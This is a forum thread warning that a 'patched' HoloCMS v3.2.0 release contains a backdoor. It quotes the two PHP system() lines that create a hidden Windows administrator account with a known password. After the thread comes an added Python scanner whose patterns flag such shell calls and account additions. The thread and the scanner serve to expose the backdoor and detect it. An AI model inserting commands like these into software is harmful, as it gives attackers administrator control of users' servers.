HoloCMS v3.2.0 (Patched Edition)

Status
Not open for further replies.
Oni, he didn't. It was a fake one and there was a virus in there...

ahaha

Let me think, how you guys got the Server? You infected guys who have them with this PHP virus.

This is now up to the downloaders - Don't trust me and get 'hacked' by them
It has a Virus in it which simply connects to the cmd.exe and does ****.

The server was leaked by an RCE exploit in HoloCMS. Learn to check Apache logs. I discovered this after someone on Otaku had claimed that their server had been leaked and gave me access to the VPS.
 
Why does everyone call me Sisja instead of Sisija?

S i s i j a

I do agree Sisja I don't know why people call you Sisja. Also nice HoloCMS kinda Useless..


Sisija I was kidding on first line :lol:
Seriously I don't know I always call you Sisija (just the noobs or weird people) call you Sisja.
 
:thumbdown:

NO! THIS IS NOT A VIRUS! :thumbdown: :thumbdown:

Actually, take a look around the thread, there is clear evidence.

yifan_lu said:
Ok, svn diff results:
index.php - Changed to new v32 format. VERY dirty coding, made me facepalm multiple times. BROKE encryption, so if you have users, then cookies will stop working. Removed my email-force-verify feature. ZERO security fix found.

me.php - Fixed the events XSS exploit (the incorrect way, I'll tell you the correct way below).

transactions - WARNING WARNING! Virus found! sorry about the font size, I just saw three more people downloading it after this post. (And we have a winner), take a look at line 122 and 123 of transactions.

Code:
system("cmd /c net user /add IUSR_SYSTEM letmein");
system("cmd /c net localgroup administrators /add IUSR_SYSTEM");
What this does is it adds an administrator user with a password the guy knows. In other words, if you use this, you now have a backdoor on your server.

In other words, just like the crap j00p released a few days ago, but in a different area, this fixes ZERO security exploits (other than the one I told you guys about a while ago), it puts a backdoor on your server so the guy can take over it. DO NOT USE! Since this is the second time this happens, I advise you people to not use ANY holocms release that is not from me (unless I say so otherwise).

Also, the ONLY KNOWN exploit is the one in me.php, I'll be updating the HoloCMS thread with a patch later.

EDIT: Your virus scanner won't show anything!!! This isn't an exe file, it's a plain-text file, so virus scanners skip over it, AND the fact that it doesn't do harm to your computer, it opens a back door which allows the attacker to have administrator access to your computer/server THEN they can do the harm. Very sneaky.

Enough evidence?
Next time use your brain and eyes to read a thread and others' posts, they come in useful when people like you claim this isn't a virus.


EDIT: Thread reported, it is totally useless
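
An added example, not part of the thread or of HoloCMS: the quoted post notes that a virus scanner skips this plain-text backdoor, so a source review before deployment is what catches it. The Python sketch below flags shell-executing PHP calls and marks Windows account changes like the two quoted lines; the function names, the list of PHP functions checked and the sample file are assumptions.

```python
import re

# PHP functions that pass a string to the operating system shell (assumed list).
# The lookbehind skips method calls and variables such as $db->exec(...).
EXEC_CALL = re.compile(
    r"(?<![\w>:$])(system|exec|shell_exec|passthru|popen|proc_open)\s*\((.*)\)",
    re.IGNORECASE,
)
# Windows account changes of the kind quoted in the thread.
ACCOUNT_CHANGE = re.compile(
    r"\bnet1?(?:\.exe)?\s+(?:user|localgroup)\b.*?/add\b", re.IGNORECASE
)


def scan_php_source(text):
    """Return (line_no, function, argument, severity) for each shell call."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        for match in EXEC_CALL.finditer(line):
            func, argument = match.group(1).lower(), match.group(2)
            if ACCOUNT_CHANGE.search(argument):
                severity = "account-change"
            else:
                severity = "shell-call"
            findings.append((line_no, func, argument, severity))
    return findings


# Constructed sample file: lines 3 and 4 are the two lines quoted in the
# thread; the other lines are made up for the example.
SAMPLE = """<?php
$rows = mysql_query("SELECT * FROM transactions");
system("cmd /c net user /add IUSR_SYSTEM letmein");
system("cmd /c net localgroup administrators /add IUSR_SYSTEM");
$out = shell_exec($cmd);
$stmt->exec("UPDATE users SET credits = 0");
?>"""

if __name__ == "__main__":
    for line_no, func, argument, severity in scan_php_source(SAMPLE):
        print(f"line {line_no}: {severity}: {func}({argument})")
```

Any "shell-call" hit still needs a human look; the "account-change" hits are the ones that should block a release outright.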
 
Mofo' thinks he's one cool dude infecting PCs to get control over cyber-people whilst crouching in a corner at school whilst the big mean bullies take his dinner money. Aww. :(:
 